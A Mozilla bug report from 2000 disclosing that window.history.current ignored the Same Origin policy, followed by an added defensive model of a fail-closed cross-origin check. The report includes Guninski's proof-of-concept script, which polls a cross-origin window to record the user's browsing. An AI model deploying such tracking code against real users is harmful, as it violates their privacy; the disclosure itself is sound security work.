People
(Reporter: Norris Boyd, Assigned: Mitchell Stoltz (not reading bugmail))
Tracking
Firefox Tracking Flags
(Not tracked)
Details
(Whiteboard: [nsbeta2+])
Attachments
(1 attachment)
749 bytes,
text/html
Subject: BUG: window.history.current allows tracking user's browsing
Date: Tue, 02 May 2000 15:45:02 +0300
From: Georgi Guninski <joro@nat.bg>
To: Norris Boyd <norris@netscape.com>

window.history.current is not protected by Same Origin security policy and that allows tracking user's surfing.
The code is:
--------------------------------------------------------------
<FORM>
<TEXTAREA WRAP=HARD NAME=comment ROWS=10 COLS=80></TEXTAREA>
</FORM>
<SCRIPT>
last="";
current="";
// Open a window on a different origin and keep a reference to it.
a=window.open("http://www.yahoo.com");
function checkStatus()
{
  // Cross-origin read that the Same Origin policy should have blocked.
  current=a.history.current;
  if (current != "" && current != last)
  {
    last = current;
    document.forms[0].elements[0].value += current + " ";
  }
}
// Poll twice a second for a change of location in the opened window.
setInterval("checkStatus()",500);
</SCRIPT>
--------------------------------------------------------------
Reading links using window.history.current
window.history.current is not protected by Same Origin security policy and that allows tracking user's surfing.
Follow some links in www.yahoo.com and see them in the TEXTAREA below.
(Reporter)
Comment 1•18 years ago
Created attachment 8206 [details]
Test case
(Assignee)
Comment 2•18 years ago
Need to double-check call to same-origin, check default policy. I think I can take care of this one.
(Assignee)
Updated•18 years ago
Target Milestone: --- → M16
(Assignee)
Comment 6•18 years ago
Fixed...bug in nsScriptSecurityManager. Secure prefs access was failing.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED
(Assignee)
Comment 8•18 years ago
Opening fixed security bugs to the public.
Group: netscapeconfidential?
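
Added example, not part of the original bug report and not Mozilla's code: a simplified model of the check this bug is about, where a cross-origin read of a property such as history.current is allowed only if a per-property policy says so, and a policy store that cannot be read falls back to same-origin rather than to open access. The policy names, the store functions and the opener URL are hypothetical, and the policy table is constructed for illustration.

```javascript
// Added example: simplified model of a per-property cross-origin read check.
// All names are hypothetical; this is not Mozilla's nsScriptSecurityManager code.
const POLICIES = ["allAccess", "sameOrigin", "noAccess"];
const FAIL_CLOSED_DEFAULT = "sameOrigin";

// Two URLs share an origin when scheme, host and port all match.
function sameOrigin(a, b) {
  const oa = new URL(a).origin;
  const ob = new URL(b).origin;
  return oa !== "null" && oa === ob; // opaque origins never match
}

// `lookup` stands in for the policy store; it may throw or return nothing.
function resolvePolicy(lookup, prop) {
  try {
    const policy = lookup(prop);
    if (POLICIES.includes(policy)) return policy;
  } catch (err) {
    // An unreadable store must not widen access; fall through to the default.
  }
  return FAIL_CLOSED_DEFAULT;
}

function canRead(callerUrl, targetUrl, prop, lookup) {
  const policy = resolvePolicy(lookup, prop);
  if (policy === "allAccess") return true;
  if (policy === "noAccess") return false;
  return sameOrigin(callerUrl, targetUrl);
}

// Constructed sample policy table and stores.
const table = new Map([
  ["history.current", "sameOrigin"],
  ["window.closed", "allAccess"],
]);
const workingStore = (prop) => table.get(prop);
const brokenStore = () => { throw new Error("policy store unreadable"); };

// Constructed URLs: an opener page and the window it opened, as in the report.
const opener = "http://opener.example/test.html";
const popup = "http://www.yahoo.com/";
for (const [name, store] of [["working", workingStore], ["broken", brokenStore]]) {
  console.log(name, "store, cross-origin history.current:",
    canRead(opener, popup, "history.current", store));
}
```
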